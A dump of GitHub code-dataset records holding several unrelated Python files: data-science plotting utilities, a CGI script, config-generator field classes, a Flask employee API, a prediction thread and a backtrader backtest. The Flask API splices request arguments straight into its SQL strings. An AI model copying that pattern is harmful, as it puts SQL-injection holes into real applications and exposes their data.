"file_size_in_byte": 7407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "piperci_gman.artman.ArtMan", "line_number": 46, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 41, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 65, "usage_type": "argument"}, {"api_name": "pytest.fail", "line_number": 68, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 96, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 104, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 149, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 155, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 164, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 183, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 194, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 188, "usage_type": "attribute"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 203, "usage_type": "argument"}, {"api_name": "piperci_gman.orm.models.Task", "line_number": 209, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Task.task_id", "line_number": 209, "usage_type": "attribute"}, {"api_name": "piperci_gman.orm.models.TaskEvent.create", "line_number": 211, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.TaskEvent", "line_number": 211, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 214, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 215, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 216, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db.drop_tables", "line_number": 229, "usage_type": "call"}, {"api_name": "piperci_gman.orm.models.db", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.orm.models.Artifact", "line_number": 229, "usage_type": "name"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 234, "usage_type": "argument"}, {"api_name": "piperci_gman.artman.ArtMan", "line_number": 250, "usage_type": "argument"}]}
+{"seq_id": "35986754025", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport umap\nfrom collections import defaultdict\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.inspection import permutation_importance\n\n\nCOLOR_DICT = {\n 0: \"blue\",\n 1: \"orange\",\n 2: \"green\",\n 3: \"red\",\n 4: \"purple\",\n 5: \"brown\",\n 6: \"olive\",\n 7: \"gray\",\n 8: \"pink\",\n 9: \"cyan\",\n 10: \"violet\",\n 11: \"magenta\",\n}\n\n\ndef train_visualize_random_forest(\n feature_matrix: np.array,\n labels: list,\n rf_estimators: int,\n rf_random_state: int = 42,\n) -> tuple:\n \"\"\" Trains and visualizes a random forest classifier.\n\n Notes:\n This isn't intended to be particularly flexible and and is more for demo purposes.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n rf_estimators: How many estimators should be used for the RF model?\n rf_random_state: Random state seed for reproducibility.\n\n Returns:\n A dictionary of character names and labels; also returns permutation_importances.\n \"\"\"\n\n # Create the train/test split.\n X_train, X_test, y_train, y_test = train_test_split(\n feature_matrix, labels, random_state=rf_random_state\n )\n\n # Extract the character names from the test set to look at individual results later.\n char_names = X_test[:, 0]\n\n # Delete the character names column before feeding into model.\n X_train = np.delete(X_train, obj=0, axis=1)\n X_test = np.delete(X_test, obj=0, axis=1)\n\n # Train the random forest model.\n rfc = RandomForestClassifier(\n n_estimators=rf_estimators, random_state=rf_random_state\n ).fit(X_train, y_train)\n\n # Build the return dictionary\n labels_by_character = {}\n predicted_labels = rfc.predict(X_test)\n for idx, char in enumerate(char_names):\n ground_truth = y_test[idx]\n predicted = predicted_labels[idx]\n labels_by_character[char] = {\n \"true_label\": ground_truth,\n \"predicted_label\": predicted,\n }\n\n # Do the actual plotting\n fig, ax = plt.subplots(figsize=(20, 20))\n plot_confusion_matrix(rfc, X_test, y_test, normalize=None, ax=ax)\n plt.show()\n\n # Get feature importances\n permutation_importances = permutation_importance(rfc, X_test, y_test, random_state=rf_random_state, n_jobs=2)\n sorted_idx = permutation_importances.importances_mean.argsort()\n\n # Finally, return the dictionary of labels.\n return labels_by_character, permutation_importances, sorted_idx\n\n\ndef visualize_clustering_results(cluster_points: list, labels: list) -> None:\n \"\"\" Visualizes and labels the clusters resulting from an analysis.\n\n Args:\n cluster_points: [(x1, y1), (x2, y2), ..., (xN, yN)]\n labels: Label for each of the points in cluster_points.\n \n \"\"\"\n\n # First, split out the point tuples by label.\n points_by_label = defaultdict(list)\n for idx, point in enumerate(cluster_points):\n points_by_label[labels[idx]].append(point)\n\n # Next, stack the points for each label into a single array.\n big_xy_list_by_label = {}\n for label, points_for_that_label in points_by_label.items():\n big_xy_list_by_label[label] = np.stack(tuple(points_for_that_label))\n\n # Compute the centroids of each point cloud for labeling.\n centroids_by_label = {}\n for label, arr in big_xy_list_by_label.items():\n length = arr.shape[0]\n sum_x = np.sum(arr[:, 0])\n sum_y = np.sum(arr[:, 1])\n centroid = sum_x / 
length, sum_y / length\n centroids_by_label[label] = centroid\n\n # Initialize a counter to iterate through the color map\n i = 0\n plt.rcParams.update({\"font.size\": 22, \"font.weight\": \"bold\"})\n fig, ax = plt.subplots(figsize=(20, 20))\n for label, coords in centroids_by_label.items():\n ax.scatter(\n big_xy_list_by_label[label][:, 0],\n big_xy_list_by_label[label][:, 1],\n c=COLOR_DICT[i],\n s=50,\n alpha=0.5,\n label=label,\n )\n # plt.scatter(coords[0], coords[1], c=color_dict[i], label=label, s=100, alpha=0)\n ax.annotate(label, xy=coords, textcoords=\"data\", color=\"black\")\n i += 1\n ax.legend(loc=\"best\")\n plt.show()\n\n\ndef tsne_points(feature_matrix: np.array, perplexity: int) -> list:\n \"\"\" Applies a t-SNE analysis and returns the character positions grouped by class.\n\n Notes:\n This isn't the cleanest, but I want parity with the way I analyze the UMAP data, so I\n chose the format to enable that. Because this is for plotting, I don't bother with more\n than 2 t-SNE dimensions (it's hard-coded), and I use 1000 iterations, which seems to offer\n well-converged results based on my testing. I use Manhattan distance for two reasons:\n\n 1. The data is riddled with outliers in the feature space.\n 2. The attribute features range from 0 - 20(ish) while the one-hot vectors are binary,\n and using Euclidean distance would weight the attributes too heavily.\n\n Args:\n feature_matrix: (num_features x num_characters) matrix.\n labels: Ground-truth labels for the data set.\n perplexity: Perplexity for the t-SNE model. N^(1/2) is a reasonable guess.\n\n Returns:\n A list of (x, y) tuples corresponding to the coordinates of each character in the embedding\n space.\n \n \"\"\"\n number_of_t_sne_components = 2\n number_of_t_sne_iterations = 1000\n t_sne_metric = \"manhattan\"\n\n tsne = TSNE(\n n_components=number_of_t_sne_components,\n perplexity=perplexity,\n n_iter=number_of_t_sne_iterations,\n metric=t_sne_metric,\n )\n results = tsne.fit_transform(feature_matrix)\n\n # This is where my hacky plotting script makes us do unseemly things.\n tsne_1 = results[:, 0]\n tsne_2 = results[:, 1]\n plottable_list_form = []\n for idx in range(len(tsne_1)):\n plottable_list_form.append((tsne_1[idx], tsne_2[idx]))\n\n return plottable_list_form\n\n\ndef umap_points(\n feature_matrix: np.array, umap_neighors: int = 200, min_dist: float = 0.1\n) -> list:\n \"\"\" As with the t-SNE method above, but with UMAP instead. \n \n Notes:\n The choice of n_neighbors is currently defaulted to 200, because that's roughly the\n number of members of each class. 
min_dist was based on some empirical tuning.\n \n \"\"\"\n mapper = umap.UMAP(n_neighbors=umap_neighors, min_dist=min_dist, metric=\"manhattan\")\n u = mapper.fit_transform(feature_matrix)\n return list(u)\n", "repo_name": "dchannah/dndmlpy", "sub_path": "dndmlpy/analysis_utils.py", "file_name": "analysis_utils.py", "file_ext": "py", "file_size_in_byte": 6750, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "sklearn.metrics.plot_confusion_matrix", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.inspection.permutation_importance", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 120, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "attribute"}, {"api_name": "umap.UMAP", "line_number": 193, "usage_type": "call"}]}
+{"seq_id": "36373414632", "text": "#!C:\\Python27\\python\nimport cgi\nimport cgitb; cgitb.enable()\nfrom controlador_gastos import * #conexion y funciones con la tabla gastos\nfrom controlador_categorias import * #conexion y funciones con la tabla categorias\n\nprint(\"Content-Type: text/html\\n\")\n\n#Parametros de la busqueda\nform = cgi.FieldStorage() \nsesion = form.getfirst('Sesion','empty')\nuser_id = form.getfirst('user_id','empty')\nfecha_inicial = form.getfirst('fecha_inicial','empty')\nfecha_final = form.getfirst('fecha_final','empty')\n\n#Encabezado generico\nprint(\"\"\"\n\t\n\t\n\tCGI script! Python \n\t\n\t\n\"\"\"\n)\n\n#Tabla de resultados\nprint (\"\"\"\n\t \n\t\n\"\"\"\n)\n\n#Lee los campos de su formulario para la modificacion de registros\nprint (\"\"\"\n\n\"\"\"\n)\t", "repo_name": "stormvolt/SGPF", "sub_path": "sitio_web/tabla_gastos.py", "file_name": "tabla_gastos.py", "file_ext": "py", "file_size_in_byte": 4402, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cgitb.enable", "line_number": 3, "usage_type": "call"}, {"api_name": "cgi.FieldStorage", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "42800583313", "text": "from .utils import str_or_none\n\n\nclass SourceField:\n\n def __init__(\n self, source, source_field_name, field_description,\n is_title, is_facet, field_type, index_field):\n\n self.source = str_or_none(source)\n self.source_field_name = str_or_none(source_field_name)\n self.field_description = str_or_none(field_description)\n self.is_title = True if is_title != '' else False\n self.is_facet = True if is_facet != '' else False\n self.field_type = str_or_none(field_type)\n self.index_field = str_or_none(index_field)\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n\n\nclass IndexField:\n\n def __init__(self, index_field, field_type, is_facet):\n\n self.index_field = index_field\n\n if field_type.endswith('[]'):\n self.field_type = field_type.rstrip('[]')\n self.is_array = True\n else:\n self.field_type = field_type\n self.is_array = False\n\n self.is_facet = is_facet\n self.source_fields = []\n\n self._added = set()\n\n def add_source_field(self, source_field):\n\n self._ensure_right_type(source_field)\n self._ensure_not_duplicate(source_field)\n self._ensure_facet(source_field)\n\n self.source_fields.append(source_field)\n\n def _ensure_right_type(self, source_field):\n\n index_type = self.field_type\n if self.is_array:\n index_type += '[]'\n\n assert source_field.field_type == index_type, \\\n f'Index field type mismatch. {source_field} must be of type {self.field_type}'\n\n def _ensure_not_duplicate(self, source_field):\n\n key = source_field.source + source_field.source_field_name\n assert key not in self._added, f'Diplicate key: {key}'\n self._added.add(key)\n\n def _ensure_facet(self, source_field):\n '''Все поля источника данного поля индекса должны иметь одинаковое значение is_facet.\n Если есть различия, то надо создать несколько полей индекса\n '''\n assert source_field.is_facet == self.is_facet, \\\n f'IS_FACET mismatch: {source_field} has is_facet different from {self.is_facet}'\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n", "repo_name": "Sapunov/aisconfgen", "sub_path": "aisconfgen/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.str_or_none", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 11, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "30037749195", "text": "from datetime import datetime\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom flask_jsonpify import jsonify\nfrom flask_cors import CORS\n\ndb_connect = create_engine('sqlite:///database/enterprise.db')\napp = Flask(__name__)\napi = Api(app)\ncor_app = CORS(app)\n\n\nclass Employee (Resource):\n\n @app.route('/employees', methods=['GET'])\n def get_all_employees():\n conn = db_connect.connect() # connect to database\n query = conn.execute(\"select * from employees\") # This line performs query and returns json result\n return {'employees': [i[0] for i in query.cursor.fetchall()]} # Fetches first column that is Employee ID\n\n @app.route('/employees/', methods=['GET'])\n def get_employee(employee_id):\n try:\n eid = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n query = conn.execute(\"select * from employees where EmployeeId =%d \" % eid)\n result = {'data': [dict(zip(tuple(query.keys()), i)) for i in query.cursor]}\n return jsonify(result)\n\n @app.route('/employees/create', methods=['POST'])\n def create_employee():\n column_names = {\n \"first_name\": \"FirstName\",\n \"last_name\": \"LastName\",\n \"address\": \"Address\",\n \"birth_date\": \"BirthDate\",\n \"city\": \"City\",\n \"country\": \"Country\",\n \"email\": \"Email\",\n \"fax\": \"Fax\",\n \"hire_date\": \"HireDate\",\n \"phone\": \"Phone\",\n \"postal_code\": \"PostalCode\",\n \"reports_to\": \"ReportsTo\",\n \"state\": \"State\",\n \"title\": \"Title\"\n }\n first_name = request.args.get('first_name')\n last_name = request.args.get('last_name')\n if first_name is None or last_name is None:\n return {\"error\": \"Field names are required\"}\n if len(first_name) == 0 or len(last_name) == 0:\n return {\"error\": \"Field names are empty\"}\n columns = \",\".join(column_names.get(column) for column in request.args)\n values = \"'{}', '{}'\".format(first_name, last_name)\n try:\n for column in request.args:\n if column != \"first_name\" and column != \"last_name\":\n value = request.args[column]\n if column == \"hire_date\" or column == \"birth_date\":\n values = values + \",'{}'\".format(datetime.strptime(value, \"%Y-%m-%d\"))\n elif column == \"reports_to\":\n values = values + \",{}\".format(int(value))\n else:\n values = values + \",'{}'\".format(value)\n except Exception as e:\n return {\"error\": \"Verify your parameters: {}\".format(e)}\n conn = db_connect.connect()\n print(columns, values)\n query = conn.execute(\"INSERT INTO employees (\" + columns + \") VALUES ( \" + values + \" )\")\n return {\"success\": \"Employee created, number of rows {}\".format(query.rowcount)}\n\n @app.route('/employees/delete', methods=['POST'])\n def delete_employee():\n employee_id = request.args.get('employee_id')\n if employee_id is None:\n return {\"error\": \"Employee ID not defined\"}\n try:\n employee_id = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n query = \"DELETE FROM employees where EmployeeId =%d \" % employee_id\n query = conn.execute(query)\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n @app.route('/employees/delete/last', methods=['POST'])\n def delete_last_employee():\n conn = db_connect.connect()\n query = conn.execute(\"DELETE FROM 
employees where EmployeeId = (SELECT MAX(EmployeeId) FROM employees)\")\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n\napi.add_resource(Employee) # Route_1\n\nif __name__ == '__main__':\n app.run(port='5002')\n", "repo_name": "amanajas/flask", "sub_path": "rest.py", "file_name": "rest.py", "file_ext": "py", "file_size_in_byte": 4333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 10, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 14, "usage_type": "name"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}]}
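Since the record above wires its endpoints with plain `@app.route` decorators, the service can be exercised with any HTTP client once `rest.py` is running on port 5002. A client-side sketch with `requests` follows; the parameter names mirror the handlers' `request.args` keys, and the base URL is an assumption.

```python
import requests

BASE = "http://127.0.0.1:5002"

# Create an employee; only first_name and last_name are required.
created = requests.post(
    f"{BASE}/employees/create",
    params={"first_name": "Ada", "last_name": "Lovelace", "hire_date": "2020-01-15"},
)
print(created.json())

# List all ids, then fetch the newest record by id.
ids = requests.get(f"{BASE}/employees").json()["employees"]
print(requests.get(f"{BASE}/employees/{ids[-1]}").json())

# Remove the most recently inserted row.
print(requests.post(f"{BASE}/employees/delete/last").json())
```

Note that the create endpoint reads the query string rather than a JSON body, which is why `params=` (not `json=`) is used here.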
+{"seq_id": "16242697518", "text": "import threading\nimport time\nfrom utils.gendern import gender_detector\nfrom utils.age import age_detector\nfrom utils.emotion import emotion_detector\n\nclass prediction:\n def __init__(self, gen_det, age_det, emo_det):\n self.age_detector = age_detector()\n self.gender_detector = gender_detector()\n self.emotion_detector = emotion_detector()\n self.images = []\n self.results = []\n self.gen_det=gen_det\n self.age_det=age_det\n self.emo_det=emo_det\n\n def start_threads(self):\n x = threading.Thread(target=self.predict, args=([]), daemon=True)\n x.start()\n\n def pass_detections(self, dets):\n self.images = dets\n\n def predict(self):\n while True:\n try:\n newdets = []\n for img in self.images:\n age = \"\"\n gender = \"\"\n emotion = \"\"\n # Predict gender\n if(self.gen_det):\n gender = self.gender_detector.detect_gender(img[1])\n # Predict age\n if(self.age_det):\n age = self.age_detector.detect_age(img[1])\n # Predict emotion\n if (self.emo_det):\n emotion = self.emotion_detector.detect_emotion(img[1])\n # Append results to newdets\n newdets.append([img[0], img[1], gender, age, emotion])\n self.results = newdets\n except Exception as e:\n print(str(e))\n time.sleep(1/10)", "repo_name": "kretmatt/InnovationLab3", "sub_path": "utils/prediction.py", "file_name": "prediction.py", "file_ext": "py", "file_size_in_byte": 1612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.age.age_detector", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.gendern.gender_detector", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.emotion.emotion_detector", "line_number": 11, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "5157315117", "text": "\nimport numpy as np\nimport matplotlib\nimport pandas as pd\nimport datetime\nimport os.path\nimport sys\nimport math\nimport backtrader as bt\n\nfrom backtrader_plotting import Bokeh\nfrom backtrader_plotting.schemes import Tradimo\nmatplotlib.use('QT5Agg')\n\n\nfrom enum import Enum\nclass OrderDirection(Enum):\n NOTHING = 1\n BUY = 2\n SELL = 3\n\ndef StrategyN(n):\n return globals()['Strategy'+str(n)]\n\n\n\ndef Strategy1(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy2(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy3(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\n\n\n\n \n# Create a Stratey\nclass TestStrategy(bt.Strategy):\n params = (\n ('Strategy_idx', 1),\n ('backtest_days', 6),\n ('len_df', 10), \n )\n\n \n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.datas[0].datetime[0]\n dt = bt.num2date(dt)\n print('%s(%d), %s' % (dt.isoformat(), self.nextcount, txt), file=self.f)\n\n def __init__(self):\n print('Strategy_idx'+str(self.p.Strategy_idx))\n self.outputpath = 'output.txt'\n self.f = open(self.outputpath, 'w') \n # self.profit_ratio = 2.5\n self.singleposloss = 5.0\n self.nextcount = 0\n self.dataclose = self.datas[0].close\n # self.lastcounttrade = 4000\n \n # To keep track of pending orders\n self.order = list()\n self.order_executed_price = None\n self.order_takeprofit_price = None\n self.order_stoploss_price = None\n self.order_size = None\n self.sma = bt.indicators.SimpleMovingAverage(period=self.p.len_df-24*self.p.backtest_days)#dummy for prepare data\n \n \n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log('BUY EXECUTED, %.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))\n elif order.issell():\n self.log('SELL EXECUTED, %.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))#, cerebro.broker.getvalue()\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled]:\n self.log('Order Canceled')\n elif order.status in [order.Margin]:\n self.log('Order Margin')\n elif order.status in [order.Rejected]:\n self.log('Order Rejected') \n\n # Write down: no pending order\n self.order = None\n \n def stop(self):\n self.order = self.order_target_size(target=0) \n self.log('STOP')\n self.log('CURRENT POSITION: %.8f' %self.getposition(self.data).size)\n self.log('TEST COUNT: %d' %self.nextcount)\n self.f.close()\n \n def next(self): \n self.nextcount = self.nextcount + 1\n self.log('Close, %.8f' %(self.dataclose[0]))\n \n if self.order:\n return\n\n\n # Check if we are in the market\n if not self.position:\n # print(len(self.dataclose))\n # print(self.datas[0].datetime.get(size=len(self.dataclose)))\n coldata_time = 
self.data.datetime.get(size=len(self.dataclose))\n coldata_open = self.data.open.get(size=len(self.dataclose))\n coldata_high = self.data.high.get(size=len(self.dataclose))\n coldata_low = self.data.low.get(size=len(self.dataclose))\n coldata_close = self.data.close.get(size=len(self.dataclose))\n coldata_volume = self.data.volume.get(size=len(self.dataclose))\n df_new = pd.DataFrame({'open': coldata_open,\n 'high': coldata_high,\n 'low': coldata_low,\n 'close': coldata_close,\n 'volume': coldata_volume})\n df_new.index = pd.to_datetime(df_new.index, format = '%Y-%m-%d %H:%M:%S')\n df_new.index.name = 'dateTime'\n\n direction, pexec, pslimit, psloss = StrategyN(self.p.Strategy_idx)(df_new)\n\n \n # sanity check: a BUY bracket needs psloss < pexec < pslimit, a SELL bracket the reverse\n if direction == OrderDirection.BUY and (pexec < psloss or pslimit < pexec):\n direction = OrderDirection.NOTHING\n if direction == OrderDirection.SELL and (pexec > psloss or pslimit > pexec):\n direction = OrderDirection.NOTHING\n \n if direction == OrderDirection.BUY:\n self.order_size = self.singleposloss/(pexec-psloss)\n self.log('BUY CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n pexec*self.order_size,\n pslimit,\n psloss))\n self.order = self.buy_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n \n \n elif direction == OrderDirection.SELL: \n self.order_size = self.singleposloss/(psloss-pexec)\n self.log('SELL CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n pexec*self.order_size,\n pslimit,\n psloss)) \n self.order = self.sell_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n\n\n\n# Create a cerebro entity\n \ndef run_backtest(target_pair, Strategy_idx, backtest_days):\n cerebro = bt.Cerebro()\n # df.to_csv('rawdata.csv',index=False)\n df = pd.read_csv('./1h_all/' + target_pair + '.csv', index_col=\"dateTime\", infer_datetime_format=True, parse_dates=True)\n df = df[[\"open\", \"high\", \"low\", \"close\", \"volume\"]]\n df.columns = [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n # df = df.tail(24*30*2)#60days backtest\n \n df.to_csv('./backtest/' + target_pair + '.csv')\n \n \n \n\n \n\n \n # Add a strategy\n cerebro.addstrategy(TestStrategy, Strategy_idx=Strategy_idx, backtest_days=backtest_days, len_df=len(df))\n \n\n # Datas are in a subfolder of the samples. 
Need to find where the script is\n # because it could have been called from anywhere\n modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\n datapath = os.path.join(modpath, './backtest/' + target_pair + '.csv')\n \n rawdata = bt.feeds.GenericCSVData(\n dataname=datapath,\n dtformat=('%Y-%m-%d %H:%M:%S'),\n name='rawdata',\n openinterest=-1\n )\n cerebro.adddata(rawdata)\n \n \n cerebro.resampledata(\n rawdata, \n timeframe=bt.TimeFrame.Days, #timeframe=bt.TimeFrame.Minutes, \n compression=1, #compression=60*8, \n name='daydata'\n )#8HR S/R\n # cerebro.adddata(pivotdata)\n \n cerebro.addobserver(bt.observers.Benchmark,\n timeframe=bt.TimeFrame.Weeks\n )\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\n\n cerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\n # 1.6 - 1.9 Below average\n # 2.0 - 2.4 Average\n # 2.5 - 2.9 Good\n # 3.0 - 5.0 Excellent\n # 5.1 - 6.9 Superb\n # 7.0 - Holy Grail?\n \n # Set our desired cash start\n cerebro.broker.setcash(162*10.0)\n \n \n \n # Print out the starting conditions\n print('Starting Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue()\n # Run over everything\n # cerebro.run(runonce=False)\n strategies = cerebro.run()\n firstStrat = strategies[0]\n \n # Print out the final result\n print('Final Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue() - myportfolio\n # cerebro.plot(style=\"candle\", iplot=False)\n \n # b = Bokeh(filename='chart.html', style='bar', plot_mode='single', scheme=Tradimo())\n # cerebro.plot(b, iplot=False)\n \n \n \n sqn = firstStrat.analyzers[1].get_analysis()['sqn']\n trades = firstStrat.analyzers[1].get_analysis()['trades']\n\n \n return sqn, trades, myportfolio\n\nif __name__ == '__main__':\n \n try:\n target_pair = (sys.argv[1])\n Strategy_idx = (sys.argv[2])\n backtest_days = (sys.argv[3])\n except:\n target_pair = \"BTCUSDT\"\n Strategy_idx = 3#3:0.6, 4:0.3\n backtest_days = 7\n \n run_backtest(target_pair, Strategy_idx, backtest_days)\n ", "repo_name": "hunej/BinanceFuturesQuanTradingFramework", "sub_path": "mybacktest.py", "file_name": 